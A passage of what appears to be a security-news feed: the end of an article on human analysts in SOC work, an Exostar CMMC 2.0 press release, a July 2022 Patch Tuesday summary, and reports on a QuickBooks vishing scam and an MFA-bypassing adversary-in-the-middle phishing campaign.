Automating this facet of SOC operations allows these AI-based tools to do the tedious work of sifting out false positives and correlating and surfacing real alerts in real time. Automation can also go a step further, applying rules in playbooks to enrich alerts with context (which machine or user, what happened, when), contain suspicious activity in the network, and trigger an automatic response in well-defined use cases.

The result can be minimizing the volume of alerts by a factor of 10 or more, from 10,000 a day to 1,000 or less. This noise reduction saves up to 50% of expert SOC labor, dramatically increasing SOC efficiency and effectiveness.

**Humans Are the Ones Who Catch the Cybercriminals in Action  
**

This type of automation frees expert human analysts to use their experience, skills, intuition, and problem solving in the hunt for cybercriminals active in your environment. The automation feeds junior SOC analysts who triage the findings by applying human intelligence to recognizing patterns, evaluating anomalies, eliminating false positives, and identifying alerts that need further human assessment.

For example, John in HR typically accesses two databases during regular business hours. An alert comes through that John has accessed a third database on a Saturday. Only a human can determine if this new behavior is anomalous but nonthreatening. After the SOC analyst notifies the IT department about the unexpected database activity, IT confirms that John has been granted temporary access to the additional data, which is HR-related.

After triage by junior SOC analysts, high-priority alerts are forwarded to SOC senior analysts. These skilled security specialists are charged with investigating the alerts and identifying where an attack is coming from, the cybercrime groups behind the attack, methods they are using, lateral movement observed, and the dwell time of attackers. SOC experts also propose strategies for mitigation and eradication.

Humans are most essential when identifying attacks that cut across different systems, applications, and access methods. It was skilled humans who uncovered new activity on the part of Hafnium. The nation-state cybercriminals had been exploiting vulnerabilities in Microsoft Exchange servers to steal emails, compromise networks, and move laterally in affected organizations. These incursions took place for three months prior to discoveries credited by Microsoft to researchers at security firms Volexity and Dubex.

**Key Takeaways  
**

Organizations of any size, but particularly midsize and larger enterprises, can benefit from having their SOCs use artificial intelligence, unsupervised ML, and automation to remove the burden of first-level event log screening from junior analysts and provide intelligence that senior analysts can use in investigations. Such automation is necessary to handle the ever-increasing volume, velocity, and variety of security telemetry. It cannot, however, eliminate the need for the expert human analyst.

SOC analysts need not be concerned about job security in the face of ML and automation. Rather, they should welcome the improved productivity and freedom automation provides to use their intelligence and creativity for higher-value activities such as research, threat analysis, remediation, and threat hunting.

Keep Humans in the Loop in SOC Operations

Upgrades to the Exostar platform promote secure, compliant collaboration and handling of controlled unclassified information.

**HERNDON, VA, July 12, 2022 –** Exostar, a leader in trusted, secure business collaboration in highly regulated industries including aerospace and defense, today announced the availability of updates to The Exostar Platform that allow small and medium-sized businesses (SMBs) to overcome the technology, time, and cost obstacles of preparing for and demonstrating compliance with Department of Defense (DoD) cybersecurity requirements.

Firms throughout the Defense Industrial Base (DIB), including SMBs deep in the DoD supply chain, will have to acquire Cybersecurity Maturity Model Certification (CMMC) 2.0 certification as soon as May 2023 to participate in subsequent DoD contract solicitations. According to CMMC version 2.0, any member of the DIB that stores or handles Controlled Unclassified Information (CUI) during program execution must meet the 110 practices defined at CMMC Maturity Level 2. Many SMBs simply do not possess the expertise, bandwidth, or budget to go it alone.

Exostar’s Managed Microsoft 365 for CMMC directly addresses these challenges. This managed solution, based on Microsoft Teams and hosted in a Microsoft 365 Government Cloud Computing (GCC) High environment, is designed specifically for SMBs and delivers benefits including:

*   A secure workspace for SMB users within GCC High – without the expense and burden of acquiring, setting up, and managing their own tenant.
*   Rapid onboarding – subscribe today and be working tomorrow.
*   Implementation of the security controls necessary to properly protect CUI – and facilitate compliance with CMMC 2.0 and other DoD cybersecurity standards.
*   Enterprise-grade security at a price SMBs can afford, with room to grow for an enterprise license.

In addition to the launch of Exostar’s Managed Microsoft 365 for CMMC, the company has updated and upgraded its CMMC Ready Suite within The Exostar Platform to provide out-of-the-box support to accelerate SMBs throughout their CMMC 2.0 accreditation journeys:

*   Certification Assistant – Offers plainspoken descriptions of CMMC practices at all three Maturity Levels, helping SMBs to conduct compliance self-assessments and scoring, gather documentation, and prepare for any necessary third-party audits ahead of accreditation.
*   Exostar PolicyPro – Evaluates existing policies (including gap analysis) and/or generates new ones in accordance with all policy requirements defined in CMMC 2.0 practices.
*   CMMC 2.0 Basic Assessment – Provides expert guidance from Exostar-vetted cybersecurity compliance specialist partners who use Exostar’s CMMC Ready Suite to address an SMB’s unique circumstances and accelerate the accreditation process.

“SMBs are the lifeblood of the DIB. While they must improve their cybersecurity capabilities to better protect CUI throughout the DoD supply chain, CMMC 2.0 represents a heavy lift for many of these companies,” said Tony Farinaro, Exostar’s Chief Revenue Officer. “We continue to enhance and expand our CMMC offerings to make it easier and more cost effective for SMBs to meet their obligations so they can stay in the DIB, win business, and keep innovating on behalf of the DoD.”

In addition to SMBs, enterprises also can subscribe to Exostar’s Managed Microsoft 365 for CMMC, as well as purchase the other applications and services in The Exostar Platform’s CMMC Ready Suite, today.

**About Exostar**

The Exostar Platform supports exclusive communities within highly regulated industries where organizations securely collaborate, share information, and operate compliantly. Within these communities, we build trust. More than 150,000 companies and agencies in 175 countries trust Exostar to strengthen security, reduce expenditures, raise productivity, and help them achieve their digital transformation initiatives. Nearly half of the Defense Industrial Base, including 98 of the top 100, transact business over The Exostar Platform. Eleven of the top twenty global biopharmaceutical companies rely on The Exostar Platform to help them speed new medicines and therapies to market. Exostar is a Gartner Cool Vendor. For more information, please visit www.exostar.com, and follow Exostar on LinkedIn and Twitter.

Exostar Empowers SMBs with Enhanced, Low-Cost, Easy-to-Use Microsoft 365 and CMMC 2.0 Solutions

July's Patch Tuesday gives us a lot of important security updates. Most prominently, a known to be exploited vulnerability in Windows CSRSS.
The post Update now—July Patch Tuesday patches include fix for exploited zero-day appeared first on Malwarebytes Labs.

It’s time to triage a lot of patching again. Microsoft’s July Patch Tuesday includes an actively exploited local privilege escalation vulnerability in the Windows Client/Server Runtime Subsystem (CSRSS). This vulnerability immediately made it to the Cybersecurity & Infrastructure Security Agency (CISA) list of known to be exploited in the wild list that are due for patching by August 2, 2022.

**Microsoft**

In total the Microsoft updates include fixes for 84 vulnerabilities. Four of these vulnerabilities are labelled as “Critical” since they are remote code execution (RCE) vulnerabilities.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that ware assigned to the four Critical vulnerabilities:

CVE-2022-22029: Windows Network File System (NFS) RCE vulnerability. This vulnerability is not exploitable in NFSV4.1. Prior to updating your version of Windows that protects against this vulnerability, you can mitigate an attack by disabling NFSV3, but this may adversely affect your ecosystem and should only be used as a temporary mitigation.

CVE-2022-22039: Another Windows Network File System (NFS) RCE vulnerability. It’s possible to exploit this vulnerability over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger an RCE.

CVE-2022-22038: Remote Procedure Call Runtime RCE vulnerability. Successful exploitation of this vulnerability requires an attacker to invest time in repeated exploitation attempts through sending constant or intermittent data.

CVE-2022-30221: Windows Graphics Component RCE vulnerability. An attacker would have to convince a targeted user to connect to a malicious RDP server. On connecting, the malicious server could execute code on the victim’s system in the context of the targeted user.

**Azure Site Recovery**

A huge part of the patches consist of 32 vulnerabilities in the Azure Site Recovery suite that could have allowed attackers to gain elevated privileges or perform remote code execution. Azure Site Recovery is an integrated disaster recovery service for Azure that helps ensure business continuity by keeping business apps and workloads running during outages.

According to Microsoft, SQL injection vulnerabilities caused most of the privilege escalation bugs in Azure Site Recovery.

**CVE-2022-22047**

The vulnerability that is known to be exploited in the wild is an elevation of privilege (EoP) vulnerability. An attacker who successfully exploited this vulnerability could gain SYSTEM privileges.

This type of vulnerability usually comes into play once an attacker has gained an initial foothold. They can then use this vulnerability to gain more permissions and expand their access to the compromised system.

The vulnerability is described as a Windows CSRSS Elevation of Privilege vulnerability. CSRSS is the Windows component that provides the user mode side of the Win32 subsystem. CSRSS is critical for a system’s operation and is mainly responsible for Win32 console handling and GUI shutdown.

This type of vulnerability are often chained together with others in macros, which makes the decision to roll back Office Macro blocking incomprehensible, even if it is only temporary.

**Other vendors**

Other vendors have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.

Adobe released security updates for Acrobat, Character Animator, Photoshop,  Reader, and RoboHelp.

Cisco released critical updates for Cisco Expressway Series, Cisco TelePresence Video Communication Server, Cisco Email Security Appliance, Cisco Secure Email and Web Manager, Cisco Small Business RV110W, RV130, RV130W, and RV215W routers, and several other security updates.

Citrix released hotfixes to address a problem that may affect Citrix Hypervisor and Citrix XenServer under some circumstances.

Google released Android’s July security updates including 3 labelled as “Critical”.

SAP released its July 2022 Patch Day bulletin with 20 new Security Notes.

VMWare released security updates.

Stay safe, everyone!

Update now—July Patch Tuesday patches include fix for exploited zero-day

Businesses receive an invoice via email with a credit card charge and are asked to call a fake number and hand over personal information to receive a refund.

Cybercriminals are posing as Intuit's popular accounting software package QuickBooks to target Google Workspace and Microsoft 365 small business users in a voice-phishing scam.

The campaign sends a false invoice via email containing a claim that a credit card has already been charged for an order. In order to dispute the charge, victims are directed to call the number included in the email, according to researchers with INKY. The scam was first uncovered in December 2021 and the frequency of attack has accelerated sharply, they said.

The threat actors have been leveraging QuickBooks' free 30-day trial offer to set up fake accounts from which to send fraudulent invoices, impersonating major IT companies including Amazon, Apple, PayPal, and McAfee. Once the victim calls, they are asked for bank account information, login credentials, or other personally identifiable information.

"These attacks were highly effective at evading detection because they were identical to non-fraudulent Quickbooks notifications, even when examining the emails' raw HTML files closely," the report noted. "All notifications originated from authentic Intuit IP addresses, passed email authentication (SPF and DKIM) tests for intuit\[.\]com, and only contained high-reputation intuit\[.\]com URLs."

One such scam in April impersonated an Amazon Prime shipping notification, which used the strings "amazn" and "amzn" to evade detection filters. By clicking on the "print or save" or "view invoice" buttons, the victim is then taken to Intuit's website and shown a fraudulent invoice, inducing the user to call the number and give up financial information.

"The natural response is to get right on the phone and try to back the order out, or, barring that, find a way to obtain a refund," the INKY report noted. "The phishers take advantage of this disrupted emotional state to extract personal or financial information before the victim realizes that something is off."

**Defense Requires Vigilance**

INKY recommends that recipients of these kinds of messages should refrain from calling any phone numbers they provide and be wary of requests for payment through the form of gift cards, a method unlikely to be used by businesses.

"If there is any doubt about a charge, it is best to contact the relevant credit card company to see if there really is a charge in that amount," the report noted. "Any real charge would be shown as 'pending'."

Small businesses are increasingly targets for cyberattacks, according to recent research; however, just 40% of small businesses have a cybersecurity policy. Among the key steps small businesses can take to improve their security posture is adopting strong security policies and training employees in best practices, along with tactical investments in cybersecurity software.

**Plenty of Phishing in the Sea**

Meanwhile, cybercriminals are deploying new vishing methods to defraud victims, according to a report from Kaspersky, including attacks carried out through popular social media sites or major IT service providers like PayPal. A recent vishing scam cited by Kaspersky was based on a widespread TikTok prank where friends use an automated answering-machine voice to warn them that a lot of money will soon be taken out of their bank account.

"When people are convinced to disclose their personal data during a phone call rather than on a phishing page, they often don't have the chance to consider that they are the target of a hoax — and the large number of TikTok videos with this prank is a prominent example of this," according to Kaspersky.

The security firm reports that the volume of vishing is on the rise, with 350,000 vishing emails between March and June 2022, with nearly 100,000 of these emails spotted in June alone.

QuickBooks Vishing Scam Targets Small Businesses

Attackers used adversary-in-the-middle attacks to steal passwords, hijack sign-in sessions and skip authentication and then use victim mailboxes to launch BEC attacks against other targets.

Attackers used adversary-in-the-middle attacks to steal passwords, hijack sign-in sessions and skip authentication and then use victim mailboxes to launch BEC attacks against other targets.

Microsoft researchers have uncovered a massive phishing campaign that can steal credentials even if a user has multi-factor authentication (MFA) enabled and has so far attempted to compromise more than 10,000 organizations.

The campaign, which has been active since September 2021, depends upon the use of adversary-in-the-middle (AiTM) phishing sites in the initial attacks to hijack session cookies and steal credentials. From there, attackers can access victims’ user mailboxes to launch further attacks against other targets, the Microsoft 365 Defender Research Team from the Microsoft Threat Intelligence Center (MTIC) wrote in a blog post published Tuesday.

In AiTM attacks, a threat actor deploys a proxy server between a target user and the website the user wishes to visit–that is, the site the attacker wishes to impersonate, researchers explained.

“Such a setup allows the attacker to steal and intercept the target’s password and the session cookie that proves their ongoing and authenticated session with the website,” they wrote.

It’s important to point out that this type of attack does not denote a vulnerability in the type of MFA employed by a corporate email system, they added. AiTM phishing steals the session cookie, so the attacker gets authenticated to a session on the user’s behalf regardless of the sign-in method the latter uses, researchers said.

Indeed, attackers are getting wise to organizations’ increasing use of MFA to better secure user accounts and creating more sophisticated phishing attacks like these that can bypass it, noted a security professional.

“While MFA is certainly valuable and should be used when possible, by capturing the password and session cookie–and because the session cookie shows that MFA was already used to login–the attackers can often circumvent the need for MFA when they login to the account again later using the stolen password,” observed Erich Kron, security awareness advocate at security awareness training firm KnowBe4, in an email to Threatpost.

****AiTM Phishing, Unpacked****

In their observation of the campaign, Microsoft researchers took a deeper dive into how these types of attacks work and how they can be used to mount secondary business email compromise (BEC) attacks once initial access to someone’s account is gained, they said.

AiTM phishing attacks depend upon the session that every modern web service implements with a user after successful authentication so that the user doesn’t have to be authenticated at every new page they visit, researchers explained.

“This session functionality is implemented through a session cookie provided by an authentication service after initial authentication,” they wrote. “The session cookie is proof for the web server that the user has been authenticated and has an ongoing session on the website.”

In AiTM phishing, an attacker attempts to steal a target user’s session cookie so they can skip the whole authentication process and act as if they are the legitimate authenticated user, researchers said.

“To do this, the attacker deploys a webserver that proxies HTTP packets from the user that visits the phishing site to the target server the attacker wishes to impersonate and the other way around,” they wrote. “This way, the phishing site is visually identical to the original website (as every HTTP is proxied to and from the original website).”

This attack is especially convenient for threat actors because it precludes the need for them to craft their own phishing sites such as the ones used in conventional phishing campaigns, researchers noted.

****Specific Attack Vector****

In the phishing campaign observed by Microsoft researchers, attackers initiate contact with potential victims by sending emails with an HTML file attachment to multiple recipients in different organizations. The messages claim that the recipients have a voicemail message and need to click on the attachment to access it or it will be deleted in 24 hours.

If a user clicks on the link, they are redirected to a site that tells them they will be redirected again to their mailbox with the audio in an hour. Meanwhile, they are asked to sign in with their credentials.

At this point, however, the attack does something unique using clever coding by automatically filling in the phishing landing page with the user’s email address, “thus enhancing its social engineering lure,” researchers noted.

If a target enters his or her credentials and gets authenticated, he or she is redirected to the legitimate Microsoft office.com page. However, in the background, the attacker intercepts the credentials and gets authenticated on the user’s behalf, providing free reign to perform follow-on activities, researchers said.

In the phishing email chain that researchers observed, the threat actor used the authentication to commit payment fraud in secondary attacks from within the organization, researchers said.

****Follow-Up BEC and Payment Fraud****

Attackers took less than five minutes after hijacking sessions and stealing credentials to begin the process of conducting payment fraud by authenticating to Outlook to access finance-related emails and file attachments, researchers said. The following day, they accessed these emails and files every few hours to search for opportunities to commit fraud.

The threat actor also deleted from the compromised account’s Inbox folder the original phishing email they sent to hide traces of their initial access, researchers added.

“These activities suggest the attacker attempted to commit payment fraud manually,” they wrote.

Attackers also used Outlook Web Access (OWA) on a Chrome browser to commit payment fraud while using the compromised account’s stolen session cookie, researchers added.

Tag

#microsoft